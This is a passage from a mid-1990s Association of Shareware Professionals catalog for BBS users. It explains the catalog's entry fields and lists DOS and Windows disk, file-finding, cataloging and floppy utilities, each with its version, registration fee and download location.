+ A "[***]" across from the product name indicates a new or + updated description since the last catalog. + Author: name & phone number of the person or company offering + this product. See Appendix A for detailed information about + the person or company. + Version: version number (release date) + Needs: computer type [IBM PC, IBM 80386, Macintosh, etc.], + operating system, and version number. May also describe other + needed or recommended hardware & software. See above for more + details. + Registration fee: The cost of a single user license, expressed + in U.S. currency unless otherwise noted. Many authors provide + "multi-tier" registrations, and you may pay a little more or + less than the amount stated here depending on your situation. + (You can often save money by "reading the fine print.") Some + authors include shipping & handling fees in the prices while + others don't. Most authors offer network, site, and corporate + licenses for a higher fee; please contact the author in + question for details and price quotes. + SWREG#: applies only to CompuServe users. You can register this + product on CompuServe and have the cost added to your service + bill. This method of payment proves especially useful for (1) + overseas users who don't have a credit card accepted by the + author; and (2) business customers who find it easier to + register shareware by tacking the fee onto a corporate- + + ASP Catalog for BBS Users (Master Edition) 6 + + + + sponsored CompuServe account. CompuServe users should GO + CIS:SWREG for more details. + PsL#: you can register this product via the Public (software) + Library, and you can pay for it with your MasterCard, Visa, + American Express, Optima, or Discover card. Call (800) + 242-4775, have your credit card handy, and have the product's + PsL registration number handy. (Overseas customers should call + U.S. 713-524-6394.) Or if you want to fax your shareware + purchase order to PsL, fax it to (713) 524-6398. + Registration benefits: Describes the benefits you get for regis- + tering the software. All ASP shareware programs come with cer- + tain minimum benefits (see above for details). + Look for: FILENAME.EXT on BBSs (call xxx-xxx-xxxx to download it + at no charge); FNAME.EXT in GATE:FORUM forum LIB 9 on Compu- + Serve (or contact userID 78901,2345 for assistance); FILE- + NAME.EXT in ROUNDTABLE RTC LIB 9 on GEnie (or contact userID + J.QAUTHOR for assistance). + Download size: the size of the file(s) to download, in + kilobytes. A 2400 baud modem can download about 14 kilobytes + per minute under normal conditions. + Special instructions: tells if the author limits product + distribution to the United States. In some cases the author or + company may have signed a contract forbidding worldwide share- + ware distribution. In other cases the product may only appeal + to an American audience (income tax software for example). In + rare cases, U.S. federal laws may actually prohibit the author + or company from distributing the product in other countries. + Editor's note: the catalog editor may append text of his own if + something needs further explanation. + Description: a paragraph or two of text which describes the + shareware product in detail. This information comes direct + from the author or company behind the program. + + Chapter 1, "Shareware Products" 7 + + + + + + + + + + + + + + + + + + + + PART 1 + Shareware Products + + Chapter 2, "Utilities" 8 + + + + + + Chapter 2 + Utilities + + + 2.1 Disk utilities + + Product: 4DOS + Replacement for traditional command processor. See full + description on page 97. + + Product: 4DOS for Windows NT + Replacement for Windows NT command processor. See full + description on page 97. + + Product: 4OS2 + Replacement for OS/2 command processor. See full description + on page 98. + + Product: C-Menu/32 + A stunning easy 32-bit VGA menuing system. See full + description on page 152. + + Product: DRIVEMAP + Author: + Version: 1.2 (08-01-94) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; DMAP12.ZIP on CompuServe + in CIS:QUARTERDEC forum LIBrary 0. + Download size: 5k (about one minute with a 2400 baud modem) + Description: + Display information about disk drives on your PC. Identifies + floppy, fixed, network, removable, Stacker and COMpanion + drives, as well as ASSIGN, JOIN and SUBST drive mappings. Works + under DESQview. + + + Product: Easy Install + Creates instant distribution disks. See full description on + page 427. + + Chapter 2, "Utilities" 9 + + + + Product: FileFinder + Author: , 707-575-9868 + Version: 4.4 (09-20-93) + Needs: IBM PC, DOS 3.0 or better. 400k RAM; Hard disk. + Optionally uses LIST, QEDIT, Shez, and word processor. + Registration fee: $25.00 + Registration benefits: 3 months of unlimited BBS, CompuServe, + GEnie, mail support; bonus utilities. Lifetime free upgrading + allowed. + Look for: FFF44.ZIP on BBSs (call 714-636-2667 to download it at + no charge); FFF44.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 76266,2634 for assistance); FFF44.ZIP on + GEnie in IBMPC forum LIBrary 0 (or contact userID J.DERR1 for + assistance). + SWREG#: 271 + Download size: 163k (about twelve minutes with a 2400 baud modem) + Description: + Helps you find files and directories on any hard disk attached + to your PC, including network attached drives. Numerous search + options are available, including the ability to search for + files using an expanded wild card specification. I.E. "*PRO*" + will find all files that have the letters PRO anywhere in the + file name. A command line version and a full screen version + are both included. The full screen version will search for + duplicate files, allows you to launch programs, perform fuzzy + searches. + + + Product: FILE_HANDLE File Management [***] + Management program for DOS, Windows and LANs. See full + description on page 158. + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 168. + + Product: HiVIDEO + DOS memory expander for VGA/EGA systems. See full description + on page 66. + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 168. + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 31. + + Chapter 2, "Utilities" 10 + + + + Product: QuickDir + Author: , 203-723-0014 + Version: 1.32 (11-16-93) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: Mouse; Network (LAN). + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 5); disks + of other shareware; discounts on other products. 1 free update + disk(s) sent out. + Look for: QDIR132.ARJ on BBSs (call 203-753-9205 to download it + at no charge); QUICKD.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 71564,725 for assistance). + Download size: 133k (about ten minutes with a 2400 baud modem) + Description: + A must-have for maintaining your hard and networked drives. + Features an instantly displayed, multiple drive directory tree + you can customize. Over 50 DOS functions, including 'auto + verify' copy for diskettes. Easily graft or eliminate a + directory branch. Tag files for copy or move. Simple 2 key Zip, + Arj archive extract. Uses your own editor or list program. Find + duplicate, archive or any file. Delete or copy them easily. + Amazingly small (107k), fast, and a joy to use. + + + Product: Shez + Program shell for managing compressed files. See full + description on page 44. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 108. + + 2.1.1 Disk cataloging + + Product: 4EDIT + File description editor for 4DOS. See full description on + page 180. + + Product: Disk Piecharter + Graphical File Manager extension. See full description on + page 12. + + Product: DISKLIST + Diskette cover & label producer - 39 formats. See full + description on page 22. + + Chapter 2, "Utilities" 11 + + + + Product: DiskMan for Windows + Author: , 410-418-8825 + Version: 2.1 (04-01-93) + Needs: IBM PC, Windows 3.0 or better. 200k RAM. + Registration fee: $35.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe support; + 3-month return policy; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; DSKM21.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 9 (or contact userID 73507,3505 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Provides the most user friendly method to catalog floppy disks, + hard drives, bernoullis, etc. Produces professional quality + disk labels including optional graphics and also produces an + array of library reports. Full font support, file comments, + NDOS file comment compatibility, disk comments, archive + extraction, and now imports Catdisk files. "I have not found a + commercial program that comes close." + + + Product: DizView + View FILE_ID.DIZ files in all your ZIPs. See full description + on page 29. + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 30. + + Product: INFOMANIA + Author: , 813-920-0882 + Version: 2.1 (05-10-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; CGA monitor. + Strongly recommended: EGA monitor; Hard disk; Epson printer. + Registration fee: $49.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 6 months of unlimited phone, CompuServe, + GEnie, mail support; discounts on upgrades. + Look for: INFOMA21.ZIP on BBSs; INFOMA.ZIP on CompuServe in + CIS:IBMPCAPPS forum LIBrary 0 (or contact userID 73160,676 for + assistance); INFOMA21.ZIP on GEnie in IBMPC forum LIBrary 3 (or + contact userID B.SUTTON1 for assistance). + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + Find that obscure bit of information you saved somewhere two + years ago! Lets you store all your text files offline on + floppies, yet finds any word or combination in less than a + second. It will prompt you to insert the proper disk, if + needed, then automatically display the file. You can read, + copy, edit, or print any portion(s). Handles many thousands of + files, has context-sensitive hypertext help, mouse support. + + Chapter 2, "Utilities" 12 + + + + Handles files of unlimited size. Gets you organized + painlessly! + + + Product: LJ-SLEEVE + Print floppy storage sleeves on laserjets. See full + description on page 92. + + Product: ViDir/ViRes File Monitor System + Author: , 215-643-6901 + Version: 1.02 (02-28-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Memory-resident + portion: 8k-72k RAM depending on options. + Strongly recommended: Hard disk. + Registration fee: $39.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, CompuServe, + mail support; discounts on upgrades. + Look for: VIDIR*.ZIP on BBSs (call 718-837-3236 to download it at + no charge); VIDIR.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 70353,151 for assistance). + SWREG#: 2564 + PsL#: 11232 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Determines what files you never use, backs them up, and then + deletes them, helping you save up to 80% of your disk space + without deleting the programs or data files you use. It's like + connecting additional disk drives to your system without the + expense! Also helps you determine: which, of all your files, + are used the most, so you can move them to a RAM disk, and + which word processor or spreadsheet files you need to take with + you on a trip or to print your documents on another PC. + + + 2.1.2 Hard disk utilities + + Product: Bootit + Multi-boot/user defined HD specs. See full description on + page 96. + + Product: DaMenu + A premier point & shoot DOS menu. See full description on + page 153. + + Product: DATA PROTECTOR + Protect your data against anauthorized access. See full + description on page 172. + + Chapter 2, "Utilities" 13 + + + + Product: Disk Piecharter + Author: + Version: 1.1 (03-08-95) + Needs: IBM PC, Windows 3.0 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: 3 months of fax, CompuServe, mail support; + all ASP-wide offers (see page 5). + Look for: DSKPIE11.ZIP on BBSs; DSKPIE.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 8 (or contact userID 73134,2177 for + assistance). + SWREG#: 3976 + PsL#: 11746 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Windows Filemanager extension that graphically shows disk usage + per directory and per file. Zoom in and out on piechart + segments. Enables you to delete whole directory trees (if + desired) and shows the effect on free disk space. Seemless + integration with Filemanager. Once installed you'll never want + to be without it. + + + Product: Drag And Zip + Drag and Drop shell for PKZIP/UNZIP. See full description on + page 40. + + Product: DRIV_MAN + Author: , 813-377-2515 + Version: 1.30 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: DMAN130.ZIP on BBSs (call 813-371-2490 to download it + at no charge); DRIMAN.ZIP on CompuServe in CIS:IBM forum + LIBrary 0 (or contact userID 71631,744 for assistance). + Download size: 82k (about six minutes with a 2400 baud modem) + Description: + A disk utility management tool that displays pertinent logical + drive data - up to 26 drives on a single screen for analysis/ + storage. Display includes: drive data summary with cap. used + free for each avail/selected drive, drive data graph with the + same data, total disk summary and graph, and individual drive + data displaying data on one drive at a time. Options include: + selectable/editable drive range, disk storage of the disk drive + summary display, auto run, ++. + + Chapter 2, "Utilities" 14 + + + + Product: EDDY (EDit DirectorY) [***] + Author: + Version: 8a (10-16-95) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $25.00 + Registration benefits: lifetime unlimited CompuServe, mail + support. lifetime return policy. Lifetime free upgrading + allowed. + Look for: EDDY8A.ZIP on BBSs (call 415-323-4389 to download it at + no charge); EDDY.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 70162,2357 for assistance). + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + * Full-screen directory editor + * Disk & directory manager + * Backup & recovery utility + * File finder, viewer & patcher + * Hex/text string finder & replacer + * Sector editor, RAM editor + * Powerful DOS shell + ...and MUCH more! + + "Computer Language" says: + "The interface ... is elegant." + "...clean, easy-to-use, well-written program." + "...quality of product we've seen from Peter Norton." + + + Product: Examine + Author: , +44-(0)1892-531108 + Version: 1.12 (08-08-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-10.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: EXAMN112.ZIP on BBSs. + Download size: 79k (about six minutes with a 2400 baud modem) + Description: + A fast and versatile text search utility that can search both + text and binary files using either ordinary words or GREP-like + regular expressions, the UNIX searching utility, for more + sophisticated searches. Searches can be across multiple drives + over networks or can be restricted to a single directory with + the option of searching subdirectories if so desired. Files can + be viewed either with their associated application or with the + program's own fully configurable internal viewer. + + Chapter 2, "Utilities" 15 + + + + Product: ExamineZip + Author: , +44-(0)1892-531108 + Version: 1.01 (08-08-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-10.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: EXZIP101.ZIP on BBSs. + Download size: 127k (about ten minutes with a 2400 baud modem) + Description: + Searches for files and text within files stored in ZIP archives + created with PKZIP (v2.0 or below). File searches can use DOS + wild-cards while text searches can use either ordinary words or + GREP-like regular expressions. Each search can be across + multiple drives over networks or can be restricted to a single + directory. The program can also be used as a fully functional + UNZIP utility where the contents of an archive can be listed, + viewed, tested or extracted to disk. PKUNZIP is not required. + + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 30. + + Product: FootPrint + Author: , 203-723-0014 + Version: 1.4 (11-16-93) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk. + Registration fee: $22.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: FOOTPT14.ZIP on BBSs (call 203-753-2667 to download it + at no charge); FOOTPT.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 71564,6725 for assistance). + Download size: 82k (about six minutes with a 2400 baud modem) + Description: + Determines the changes which occurred on your hard or networked + drives. Use daily, for application uninstall, or auditing. + Fast; scans over 500 meg in 15 sec! LANs too. Reports all + changes, so you can easily see what happened to a file, what an + install program did, or what software changed on your PC. Saves + you tons of grief! Not a TSR. Just run FP.EXE, use option 'H' + for instructions. "When you need to know 'what happened' help + is just a FootPrint away". + + Chapter 2, "Utilities" 16 + + + + Product: Jason's File Finder + Author: , 317-782-9903 + Version: 2.0d (09-03-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $10.00 + Registration benefits: lifetime unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 5); disks of other shareware. + Look for: JFF20D.ZIP on BBSs (call 317-784-2147 to download it at + no charge); JFF.ZIP on CompuServe in CIS:PCUTIL forum LIBrary 6 + (or contact userID 73567,1547 for assistance). + SWREG#: 1493 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + Powerful, fast, and extremely easy-to-use DOS file finder. Will + search for multiple file specs, and accepts standard DOS + wildcard characters. Searches across multiple drives, either + specific or a "range" of drives, and can also search in + specific directories. Accepts any combinations of the above. + Optionally, can perform a DOS command on every file found. Will + also calculate total byte counts for found files. + + + Product: Mass-Store Copy + Copy disks with only one drive. (Opticals!). See full + description on page 34. + + Product: PALERT + Verify enough disk freespace before using pgm. See full + description on page 104. + + Product: PCOPY + Author: , 909-352-2820 + Version: 9.3 (09-01-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PCOPY93.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PCOPY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + PCOPY93.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + The COPY utility DOS should have provided. Even with DOS 6.0, + DOS COPY can be dangerous to use and has limited options. + Abundant options include: Multiple output disks, fill disks + efficiently, split files across disks, select files by date/ + time/size, update/merge dirs and more. Special *DISK*.* type + + Chapter 2, "Utilities" 17 + + + + wildcards. Scan/Make directories, prevent accidental file + overlays. Menu or command driven. Featured in PC Computing July + 1991 - Taming your Hard Disk by Preston Gralla. + + + Product: PDEL + Author: , 909-352-2820 + Version: 4.4 (05-01-92) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PDEL44.ZIP on BBSs (call 909-352-2825 to download it at + no charge); PDEL.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 76347,2477 for assistance); PDEL44.ZIP on + GEnie in IBMPC-615 forum LIBrary 5 (or contact userID PATRISOFT + for assistance). + Download size: 62k (about five minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + The file delete utility that DOS should have provided. + Extensive file selection capabilities let you delete just what + you want. Select by date/time, size, attribute, special + wildcard patterns like *DISK*.* and mode. Delete until a + specified amount of freespace exists. Wipe file data before + deleting to prevent file undelete. Test feature simulates + delete. Emergency stop by pressing any key. Recommended in PC + Computing July 1991 - Taming your Hard Disk by Preston Gralla. + + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 160. + + Product: Practical Joke Collection + Three harmless practical jokes for DOS. See full description + on page 612. + + Product: PSEARCH + Author: , 909-352-2820 + Version: 5.2B (07-01-92) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PS52B.ZIP on BBSs (call 909-352-2820 to download it at + no charge); PSRCH.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 76347,2477 for assistance); PS52B.ZIP on + + Chapter 2, "Utilities" 18 + + + + GEnie in IBMPC-615 forum LIBrary 5 (or contact userID PATRISOFT + for assistance). + Download size: 99k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Used by thousands to locate files on hard disks. You provide + words or phrases, and it will scan directory(s) to find files + containing the text. Extensive file selection and pattern + matching are provided. Provides intelligent display of found + text with scroll back and program launcher. Saves search + results for later review. Recommended in PC World as one of the + Best of Shareware products in 1990 (October 1990). + + + Product: PTOUCH + Author: , 909-352-2820 + Version: 2.0 (02-03-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $14.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PTOUCH2.ZIP on BBSs (call 909-352-2825 to download it + at no charge). + Download size: 15k (about one minute with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets you modify the date and time DOS keeps in file directories + for each file. You may either set them to the current date/ + time or to any specific value you desire. Useful for + correcting date/time when the system clock was improperly set. + Can also be used to set a group of files to the same date/time + value. This helps associate them as a synchronized group. + + + Product: QIC-BAT for CMS + Enhancement software for Colorado tape drives. See full + description on page 35. + + Product: Stowaway True Archival System + Author: , 909-352-2820 + Version: 2.2 (07-29-93) + Needs: IBM PC, DOS 3.2 or better. Hard disk. + Registration fee: $43.00 + Registration benefits: printed manual; 51/4" master disk(s). 3 + months of support. 1-month return policy. + Look for: STOW191.ZIP on BBSs (call 909-352-2825 to download it + at no charge); STOW.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + + Chapter 2, "Utilities" 19 + + + + STOW220.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Frees hard disk space by archiving inactive files from hard + disks to a library of offline archive disks. Use its directory + manager to select data to be archived. It works like a backup + program to move the files to diskette while indexing them on + your hard disk. Has data compression, automatic diskette + formatting, viewing of files prior to archival and much more. + Very professionally implemented! + + + Product: ToolBOX + Author: , 403-225-2663 + Version: 1.4 (11-14-93) + Needs: IBM PC, DOS 3.3 or better. 256k RAM. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe support. 1-month + return policy. Lifetime free upgrading allowed. 1 free update + disk(s) sent out. + Look for: TBOX14.ZIP on BBSs; TBOX14.ZI on CompuServe in + CIS:PCAPP forum LIBrary 5 (or contact userID 70724,2747 for + assistance). + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Provides an improved interface to DOS functions. It allows + access to normal DOS command line functions while adding an + improved alternative - incorporating point-and-shoot + operations, directory tree displays, text file views, and file + management activities not available through DOS. Also supplied + with a number of stand alone utilities for displaying allocated + drives, showing files accessible on the path, directory space + usage, and much more. + + Chapter 2, "Utilities" 20 + + + + Product: USEMGR + Author: , 703-821-3215 + Version: 1.0 (03-15-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; discounts on other products. 6-month + free upgrading allowed. + Look for: USEMGR10.ZIP on BBSs; USEMGR.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A new and powerful system for managing hard disks. For the + first time, you can automatically determine which files your + system accesses frequently, which it seldom uses, and which are + just unwanted clutter. Regain control of your hard disks, and + sort out the files you really use from among the myriad of + files that modern applications like Windows install on your + hard disk based on a certain knowledge of how many times each + file has been accessed and when the last access occurred. + + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 24. + + Product: XDIR + Author: , 703-821-3215 + Version: 3.05 (03-09-91) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities. 6-month free upgrading + allowed. + Look for: XDIR305.ZIP on BBSs; XDIR30.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 58k (about five minutes with a 2400 baud modem) + Description: + A commented directory utility that replaces the DOS DIR + command. You can attach a descriptive comment of up to 65 + characters to each file. The comment will appear in the + directory display. Makes sure that comments will stay with + your files when you COPY, RENAME or MOVE them. Can RUN + programs from the directory list and supports executable + extensions, automatically recognizing the appropriate + application to launch for each selected file. + + Chapter 2, "Utilities" 21 + + + + Product: XED + Hex/binary file editor w/ INS+DEL, S&R. See full description + on page 59. + + 2.1.2.1 Optimization & defragmentation + + Product: SpeedBack + Author: , 203-651-6170 + Version: 2.3 (02-12-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Hercules monitor; Hard disk; + Mouse. + Registration fee: $17.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus utilities; disks of other shareware. + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; SPDBK.ZIP on CompuServe + in CIS:PCHW forum LIBrary 1 (or contact userID 72077,437 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A fast and user friendly disk defragmenter. Using a special + algorithm to minimize movement of data, files are moved to the + front of the disk and placed in contiguous clusters. + Directories are also moved ahead of data files and cleaned up + to remove extra records. Works on all size drives and has an + easy to use mouse/hot key interface. Gets the speed back on + your favorite drive. Defragments disks with up to 24,000 + files! + + + Product: ViDir/ViRes File Monitor System + Monitor file usage; eliminate unused files. See full + description on page 12. + + Chapter 2, "Utilities" 22 + + + + 2.1.3 Floppy disk utilities + + Product: Disk Drive Cleaner + Author: , 805-541-0910 + Version: 1.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $16.50 (add $3.50 for shipping to U.S. + addresses) (add $4.75 for shipping to Canadian addresses) (add + $5.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, mail support; LAN license; site + license; all ASP-wide offers (see page 5). Bonus cleaner kit + (includes solvent & non-abrasive cleaner disk). + Look for: CLEANER1.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + Cleans floppy disk drive heads safely & effectively, preventing + data loss, unreliable performance and errors due to microscopic + foreign particles, dirt, dust, oxides and smoke that + accumulates on heads. Preventative maintenance takes only about + four minutes and requires no removal or mechanical disassembly + of the disk drive hardware. + + + Product: DISKLIST + Author: , 301-460-0354 + Version: 3.06 (01-25-94) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $35.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: DISKL306.ZIP on BBSs (call 202-547-2008 to download it + at no charge); DSK306.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 9 (or contact userID 73270,77 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + Produces diskette lists & labels with the directory contents + for 5.25", 3.5", and hard disks in 39 formats. Reads all sub- + dirs. Prints different or duplicate lists on every label on + Avery Laser label sheets. Prints on disk sleeves with PCL5. + Font downloading. Optionally displays file names in ZIP, ARC, + PAK, ZOO, and LHZ. DISKFLAP holds non-sticky list to 3.5" + disks. Configure layout of top of list. Prints on all printers, + video screen or a file. + + + Product: DJ-SLEEVE + Print storage sleeves for floppies on Deskjet. See full + description on page 88. + + Chapter 2, "Utilities" 23 + + + + Product: Double Directory + File/disk manager; 2 directories side-by-side. See full + description on page 29. + + Product: EDDY (EDit DirectorY) [***] + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + Product: FreeForm + Author: , 519-366-2732 + Version: 2.3 (11-01-94) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Dual 720k floppy drives. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support; all ASP- + wide offers (see page 5). 3-month free upgrading allowed. + Look for: availability unknown on BBSs; FF23.ZIP on CompuServe in + CIS:PCHW forum LIBrary 0 (or contact userID 72060,1153 for + assistance). + Download size: 87k (about seven minutes with a 2400 baud modem) + Description: + Formats all styles of standard DOS disks, as well as non-DOS + disks, and customized DOS disks (i.e you can make up your own + copy protection schemes.) Gives complete control over + formatting parameters such as sector size, disk density, # of + sectors and tracks. Menu driven, user configurable formatting + parameters. + + + Product: Jason's File Finder + DOS file finder, searches multiple drives. See full + description on page 15. + + Chapter 2, "Utilities" 24 + + + + Product: MAXI Form + Author: , 519-366-2732 + Version: 1.8 (12-01-93) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Dual 720k floppy drives. 360k/720k/1.2meg/1.44meg + floppy drive. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support. 2-month + free upgrading allowed. + Look for: availability unknown on BBSs; MAXI*.ZIP on CompuServe + in CIS:PCHW forum LIBrary 1 (or contact userID 72060,1153 for + assistance); MAXI*.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID MIKLOS.G for assistance). + Download size: 59k (about five minutes with a 2400 baud modem) + Description: + A floppy disk formatting program that gives more space on a + disk: 360k disks are expanded to 420k, 720 becomes 800k, 1.2 + meg becomes 1.4 meg and 1.44 meg is boosted to 1.6 meg. The + disks are user transparent to DOS version 3.20 or later and can + be used interchangeably with 